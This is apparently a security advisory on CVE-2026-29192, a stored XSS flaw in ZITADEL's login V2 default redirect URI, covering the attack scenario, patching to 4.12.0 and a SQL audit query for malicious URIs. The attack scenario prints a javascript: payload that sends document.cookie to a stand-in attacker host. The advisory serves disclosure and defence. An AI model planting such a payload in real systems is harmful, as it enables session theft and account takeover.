ZITADEL Stored XSS in Default Redirect URI Targets All Logged-In Users
ZITADEL, an open-source identity management and SSO platform, has disclosed CVE-2026-29192, a stored cross-site scripting (XSS) vulnerability that allows a malicious organization administrator to inject persistent JavaScript into the login V2 interface. Any user who authenticates through the compromised ZITADEL instance after the payload is planted will have the script execute in their browser — enabling token theft and full account takeover.
The vulnerability has a CVSS score of 7.7 and affects ZITADEL versions 4.0.0 through 4.11.1. The patch is included in version 4.12.0, released March 7, 2026.
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29192 |
| CVSS Score | 7.7 (High) |
| CVSS Vector | AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N |
| CWE | CWE-79: Cross-Site Scripting |
| Attack Type | Stored XSS via Default Redirect URI configuration |
| Authentication Required | Yes — organization administrator role |
| User Interaction | None (victims are affected on normal login) |
| Affected Versions | ZITADEL 4.0.0 – 4.11.1 |
| Patched Version | ZITADEL 4.12.0 |
| Disclosure Date | March 7, 2026 |
How the Attack Works
Root Cause
ZITADEL's login V2 interface allows organization administrators to configure a default redirect URI — a URL to which users are sent after successful authentication if no application-specific redirect is provided. This value is stored in the database and rendered in the login UI on subsequent user visits.
The vulnerability lies in insufficient sanitization of the default redirect URI before rendering it in the DOM. An administrator who can set this value can inject a JavaScript URI (javascript:...) or an HTML event handler, which is then stored and executed in every user's browser session when they log in.
Attack Scenario
1. Attacker compromises or is a malicious organization administrator
2. Attacker sets the default redirect URI to a JavaScript payload:
javascript:fetch('https://attacker.example.com/steal?c='+document.cookie)
3. The malicious value is stored in ZITADEL's database
4. Every subsequent user who logs in through this ZITADEL organization:
— The login V2 UI renders the stored URI without sanitization
— JavaScript executes automatically in the user's browser
— Session cookies, OIDC tokens, or other browser data are exfiltrated
5. Attacker uses harvested tokens to impersonate victimsWhy This Matters Despite Requiring Admin Access
Although exploiting this vulnerability requires organization administrator privileges, the threat model remains significant:
- Compromised admin credentials — A separate breach (phishing, credential stuffing, or another ZITADEL vulnerability) could give an attacker admin access, which they then leverage to implant this stored XSS for persistent, broad account harvesting
- Malicious insider — An administrator with malicious intent can silently plant the payload and harvest tokens from all users without visible disruption
- Chained exploitation — Combined with other ZITADEL vulnerabilities disclosed on the same date (CVE-2026-29193, which allows unauthorized self-registration with elevated policies), an attacker may escalate to admin before planting this payload
- Scope escalation — Because ZITADEL is an identity provider, XSS within its origin can steal tokens valid for all downstream applications — the blast radius extends far beyond ZITADEL itself
Affected Versions
| ZITADEL Version | Status | Action |
|---|---|---|
| 4.0.0 – 4.11.1 | Vulnerable | Upgrade to 4.12.0 |
| 4.12.0+ | Patched | No action required |
| < 4.0.0 | Not affected | Login V2 not present |
Remediation
Upgrade to ZITADEL 4.12.0
ZITADEL 4.12.0 applies strict validation and sanitization to the default redirect URI field, blocking javascript: URIs and other dangerous schemes from being stored or rendered.
# Docker
docker pull ghcr.io/zitadel/zitadel:v4.12.0
# Helm (Kubernetes)
helm upgrade zitadel zitadel/zitadel \
--set image.tag=v4.12.0
# Verify deployment
kubectl rollout status deployment/zitadelInterim Controls
Until upgrade is possible:
- Audit the default redirect URI — Check the current value in your ZITADEL organization settings and ensure it points to a legitimate application URL, not a
javascript:URI or external domain - Restrict administrator access — Apply least-privilege principles; limit who can modify organization-level settings
- Review administrator audit logs — Look for recent changes to redirect URI configuration
- Enable MFA for all accounts — Session tokens obtained via XSS can be used for API calls; MFA does not protect against token theft but raises the cost of full account access
Audit Query
Check for suspicious redirect URI values in your ZITADEL database:
-- PostgreSQL — check for javascript: URIs or suspicious redirect values
SELECT org_id, redirect_uri, change_date
FROM default_login_policy
WHERE redirect_uri ILIKE 'javascript:%'
OR redirect_uri ILIKE 'data:%'
OR redirect_uri NOT LIKE 'https://%';Broader ZITADEL Security Context
CVE-2026-29192 is part of a batch of four ZITADEL vulnerabilities disclosed on March 7, 2026, all affecting the login V2 interface:
| CVE | CVSS | Type | Attacker Precondition |
|---|---|---|---|
| CVE-2026-29191 | 9.3 Critical | XSS via /saml-post | Unauthenticated |
| CVE-2026-29067 | 8.1 High | Password reset header injection | Unauthenticated |
| CVE-2026-29192 | 7.7 High | Stored XSS via default redirect URI | Org Admin |
| CVE-2026-29193 | TBD | Policy bypass / unauthorized self-registration | Unauthenticated |
The simultaneous disclosure of multiple login V2 vulnerabilities suggests a focused security audit of the ZITADEL codebase, likely triggered by a security researcher or vendor-commissioned review. Organizations running ZITADEL should prioritize the 4.12.0 upgrade as it addresses all four CVEs in a single release.